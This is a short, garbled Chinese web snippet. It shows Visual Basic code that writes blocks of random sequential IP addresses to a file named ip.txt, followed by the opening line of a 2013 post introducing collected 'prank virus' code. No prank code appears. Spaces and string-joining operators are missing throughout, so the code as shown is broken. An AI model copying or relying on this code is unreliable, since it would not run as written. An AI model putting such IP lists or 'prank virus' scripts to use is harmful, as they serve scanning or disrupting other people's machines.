st.vbs生成随机IP工具的VB代码PrivateSubForm_Load()DimfsoAsNewFileSystemObjectDima,b,c,dAsIntegerDimph,eAsStringph=App.Path"\""ip.txt"Randomizea=Int(253*Rnd+1)b=Int(253*Rnd+1)c=Int(240*Rnd+1)OpenphForOutputAs#1Fori=cToc+7Forj=1To254e=a"."b"."i"."jPrint#1,eDoEventsNextjNextiClose#1UnloadMeEndSub*篇二:整人“病毒”代码(一)发表于2013-10-2310:33前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。